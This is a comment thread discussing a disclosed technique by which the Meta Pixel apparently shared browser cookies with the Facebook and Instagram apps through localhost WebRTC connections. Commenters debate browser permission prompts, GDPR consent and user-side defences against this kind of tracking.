Comment by merek
5 days ago
This is the overall process used by Meta as I understand it, taken from https://localmess.github.io/:
1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
2. User visits website on the phone's browser, say something-embarassing.com, which happens to have a Meta Pixel embedded. From the article, Meta Pixel is embedded on over 5.8 million websites. Even in In-Cognito mode, they will still get tracked.
3. Website might ask for user's consent depending on location. The article doesn't elaborate, presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools.
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays _fbp info and user id info to Meta's servers.
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
> something-embarassing.com,
Depending on the country that you or your family lives in, this could be far worse than embarrassment.
[flagged]
So main application for WebRTC is de-anonymisation of users (for example getting their local IP address). Why it is not hidden behind permission I don't understand.
The main application for WebRTC is peer to peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
Let it show "Use WebRTC?".
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always aim for a little more knowledgeable users than you think they are.
12 replies →
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
2 replies →
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
You can use a similar language for WebRTC.
6 replies →
TFA list tens of thousands of websites using WebRTC for deanonymization. How many websites using it for P2P data transfer can you list?
7 replies →
What about "This website would like to connect to the Instagram App and may share your browsing history and other personal details."
3 replies →
The website wants to connect to another computer|another app on your computer.
Most users probably will click "No" and this is a good choice.
4 replies →
> The main application for WebRTC is peer to peer data transfer.
But not for the user.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
You mean just like a million other "user-positive" browser features pushed by the biggest tracking company there is.
1 reply →
Because the decision makers don't care about privacy, they only want you to think that you have privacy, thus enabling even more spying. One solution is to not use the apps and websites from companies that are known to abuse WebRTC or something else.
This is not unique to WebRTC. The same result could be achieved by sending a http request to localhost. The only difference in this case is that using WebRTC doesn't log a http request
The browser could refuse to connect to localhost. I think there are browsers that refuse (i.e. to prevent attacking a router config interface).
2 replies →
> 1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
I happened to be immune, I disabled Background App Refresh in iOS settings. All app notifications still work, except WhatsApp :(
https://forums.macrumors.com/threads/any-reason-to-use-backg...
> except whatsapp
> company checks out
> User logged into FB or IG app. The app runs in background
So a takeaway is to avoid having Facebook or Instagram apps on your phone. I'm happy to continue to not have them.
Any others? e.g. WhatsApp. Sadly, I find this one a necessary communication tool for family and business in certain countries.
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is First Party, which means you’ve consented to permitting only that party to track you using it, and not permitting its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first party cookies, from all parties, and the OPs implication is (I think) that now these non-correlateable-by-consent first party cookies can be or are being used to track you across all sites that use them.
Not only did you only consent to the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
1 reply →
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect the Facebook or Instagram app on your device to associate visits to this website with your Meta account. Yes/No (With No selected as a default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
Which, on the face of it, sounds like a violation of the GDPR...
The intent of these laws is just so obtuse and unclear! And beyond that complying is technically impossible to implement but you could only understand that if you were a rocket scientist PhD computer science wizkid making $$$$k in California which isn't that much in such a high cost of living area donchaknow. /sardonic
>abusing mandated GDPR cookie notices to secretly track people?
How does that even work? What can GDPR cookie notices can do that the typical tracker can't do?
The cookie preference pop-up is a cookie. To track your preference, they need a cookie. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass is reached to get cases in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Also ad blocking via adaway would do the trick here I assume, as it should block Meta Pixel tracking. Overall, awful approach.